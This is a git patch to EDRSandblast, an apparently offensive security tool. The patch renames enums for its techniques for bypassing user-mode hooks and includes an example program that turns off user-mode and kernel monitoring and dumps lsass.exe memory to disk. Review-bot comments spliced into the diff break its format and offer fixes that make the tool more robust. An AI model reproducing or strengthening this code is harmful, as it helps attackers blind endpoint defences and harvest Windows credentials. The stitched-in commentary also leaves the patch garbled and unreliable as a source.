From 1dab1efdd6868f22f52e0935210e885dc2107d3b Mon Sep 17 00:00:00 2001
From: Maxime Meignan
Date: Sat, 13 Aug 2022 09:00:40 -0700
Subject: [PATCH] Changed enum names in API

---
 .../EDRSandblast_LsassDump.c | 4 ++--
 EDRSandblast_StaticLibrary/EDRSandblast_API.c | 20 +++++++++----------
 EDRSandblast_StaticLibrary/EDRSandblast_API.h | 10 +++++-----
 3 files changed, 17 insertions(+), 17 deletions(-)

diff --git a/EDRSandblast_LsassDump/EDRSandblast_LsassDump.c b/EDRSandblast_LsassDump/EDRSandblast_LsassDump.c
index 92cca91..c39f020 100644
--- a/EDRSandblast_LsassDump/EDRSandblast_LsassDump.c
+++ b/EDRSandblast_LsassDump/EDRSandblast_LsassDump.c
@@ -23,9 +23,9 @@ int main()
     if (status = EDRSB_Init(&ctx, &cfg) != EDRSB_SUCCESS) {
         printf("EDRSB_Init: %u", status);
     }
-    Usermode_RemoveAllMonitoring(&ctx, Find_and_use_existing_trampoline);
+    Usermode_RemoveAllMonitoring(&ctx, EDRSB_UMTECH_Find_and_use_existing_trampoline);
     Krnlmode_RemoveAllMonitoring(&ctx);
-    Action_DumpProcessByName(&ctx, L"lsass.exe", L"C:\\no_scan\\tmp\\tmp.tmp", Find_and_use_existing_trampoline);
+    Action_DumpProcessByName(&ctx, L"lsass.exe", L"C:\\temp\\tmp.tmp", EDRSB_UMTECH_Find_and_use_existing_trampoline);
     Krnlmode_RestoreAllMonitoring(&ctx);
     EDRSB_CleanUp(&ctx);
 }
diff --git a/EDRSandblast_StaticLibrary/EDRSandblast_API.c b/EDRSandblast_StaticLibrary/EDRSandblast_API.c
index f1ff974..0187ca0 100644
--- a/EDRSandblast_StaticLibrary/EDRSandblast_API.c
+++ b/EDRSandblast_StaticLibrary/EDRSandblast_API.c
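Review bot: The error check in the context line just above the renamed calls, `if (status = EDRSB_Init(&ctx, &cfg) != EDRSB_SUCCESS)`, parses as `status = (EDRSB_Init(...) != EDRSB_SUCCESS)`, so `status` holds 1 instead of the real status code, the printf reports that 1, and the block only logs: the new `Usermode_RemoveAllMonitoring(...)` and `Action_DumpProcessByName(...)` lines then run against a `ctx` whose initialization already failed. Splitting the statement and returning on failure fixes both problems: `status = EDRSB_Init(&ctx, &cfg);` followed by `if (status != EDRSB_SUCCESS) { printf("EDRSB_Init: %u\n", status); return 1; }`. main() begins before the hunk, so the declarations of `status`, `ctx` and `cfg` are not visible here and their types are assumed from the calls.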
@@ -519,11 +519,11 @@ VOID Usermode_EnumAllMonitoring(_Inout_ EDRSB_CONTEXT* ctx) {
 VOID Usermode_RemoveAllMonitoring(_Inout_ EDRSB_CONTEXT* ctx, EDRSB_USERMODE_TECHNIQUE technique) {
     UNHOOK_METHOD map_methods[5] = { 0 }; //maps EDRSB_USERMODE_TECHNIQUE enum with UNHOOK_METHOD enum
-    map_methods[Unhook_with_ntdll_NtProtectVirtualMemory] = UNHOOK_WITH_NTPROTECTVIRTUALMEMORY;
-    map_methods[Copy_ntdll_and_load] = UNHOOK_WITH_DUPLICATE_NTPROTECTVIRTUALMEMORY;
-    map_methods[Allocate_trampoline] = UNHOOK_WITH_INHOUSE_NTPROTECTVIRTUALMEMORY_TRAMPOLINE;
-    map_methods[Find_and_use_existing_trampoline] = UNHOOK_WITH_EDR_NTPROTECTVIRTUALMEMORY_TRAMPOLINE;
-    map_methods[Use_direct_syscall] = UNHOOK_WITH_DIRECT_SYSCALL;
+    map_methods[EDRSB_UMTECH_Unhook_with_ntdll_NtProtectVirtualMemory] = UNHOOK_WITH_NTPROTECTVIRTUALMEMORY;
+    map_methods[EDRSB_UMTECH_Copy_ntdll_and_load] = UNHOOK_WITH_DUPLICATE_NTPROTECTVIRTUALMEMORY;
+    map_methods[EDRSB_UMTECH_Allocate_trampoline] = UNHOOK_WITH_INHOUSE_NTPROTECTVIRTUALMEMORY_TRAMPOLINE;
+    map_methods[EDRSB_UMTECH_Find_and_use_existing_trampoline] = UNHOOK_WITH_EDR_NTPROTECTVIRTUALMEMORY_TRAMPOLINE;
+    map_methods[EDRSB_UMTECH_Use_direct_syscall] = UNHOOK_WITH_DIRECT_SYSCALL;
     UNHOOK_METHOD unhook_method = map_methods[technique];
     if (!ctx->foundUserlandHooks) {
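Review bot: `map_methods[technique]` at the end of the hunk indexes a five-element local table with a caller-supplied enum value and no range check, and the five renamed initializer lines depend on `EDRSB_USERMODE_TECHNIQUE` keeping exactly five members in that order while the table is still declared with the literal `map_methods[5]`; any other `technique` value reads past the array. Guard before the lookup with `if ((unsigned)technique >= _countof(map_methods)) { return; }` (`_countof` is already used elsewhere in this file), and tie the table size to the enum instead of the literal 5: a new terminal member of the enum in EDRSandblast_API.h (this patch's last hunk), for example a constructed name such as `EDRSB_UMTECH_COUNT`, would let the table be declared `map_methods[EDRSB_UMTECH_COUNT]` so the two cannot drift apart. The body of Usermode_RemoveAllMonitoring continues past the end of the hunk, so what happens with `unhook_method` afterwards is not visible here.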
@@ -552,17 +552,17 @@ EDRSB_STATUS _GetSafeNtFunctionbyUnhookingWithNtProtectVirtualMemory(_In_ LPCSTR
 EDRSB_STATUS Usermode_GetSafeNtFunc(_Inout_ EDRSB_CONTEXT* ctx, _In_ LPCSTR functionName, _Outptr_result_maybenull_ PVOID* function, EDRSB_USERMODE_TECHNIQUE technique) {
     WCHAR tempDLLFilePath[MAX_PATH] = { 0 };
     switch (technique) {
-    case Copy_ntdll_and_load:
+    case EDRSB_UMTECH_Copy_ntdll_and_load:
         GetTempPathW(MAX_PATH, tempDLLFilePath);
         PathCchCombine(tempDLLFilePath, _countof(tempDLLFilePath), tempDLLFilePath, L"ntdlol.txt");//TODO : make it configurable
         return _Usermode_GetSafeNtFunction_with_ntdll_copy(ctx, tempDLLFilePath, functionName, function);
-    case Allocate_trampoline:
+    case EDRSB_UMTECH_Allocate_trampoline:
         return _GetSafeNtFunctionUsingTrampoline(FALSE, functionName, function);
-    case Find_and_use_existing_trampoline:
+    case EDRSB_UMTECH_Find_and_use_existing_trampoline:
         return _GetSafeNtFunctionUsingTrampoline(TRUE, functionName, function);
-    case Unhook_with_ntdll_NtProtectVirtualMemory:
+    case EDRSB_UMTECH_Unhook_with_ntdll_NtProtectVirtualMemory:
         return _GetSafeNtFunctionbyUnhookingWithNtProtectVirtualMemory(functionName, function);
-    case Use_direct_syscall:
+    case EDRSB_UMTECH_Use_direct_syscall:
         *function = CreateSyscallStubWithVirtuallAlloc(functionName);
         if (*function) {
             return EDRSB_SUCCESS;
diff --git a/EDRSandblast_StaticLibrary/EDRSandblast_API.h b/EDRSandblast_StaticLibrary/EDRSandblast_API.h
index c32e073..9699ee9 100644
--- a/EDRSandblast_StaticLibrary/EDRSandblast_API.h
+++ b/EDRSandblast_StaticLibrary/EDRSandblast_API.h
@@ -32,11 +32,11 @@ typedef struct EDRSB_BYPASS_MODE_t {
 } EDRSB_BYPASS_MODE;
 typedef enum EDRSB_USERMODE_TECHNIQUE_e {
-    Unhook_with_ntdll_NtProtectVirtualMemory,
-    Copy_ntdll_and_load,
-    Allocate_trampoline,
-    Find_and_use_existing_trampoline,
-    Use_direct_syscall,
+    EDRSB_UMTECH_Unhook_with_ntdll_NtProtectVirtualMemory,
+    EDRSB_UMTECH_Copy_ntdll_and_load,
+    EDRSB_UMTECH_Allocate_trampoline,
+    EDRSB_UMTECH_Find_and_use_existing_trampoline,
+    EDRSB_UMTECH_Use_direct_syscall,
 } EDRSB_USERMODE_TECHNIQUE;
 // TODO: update values.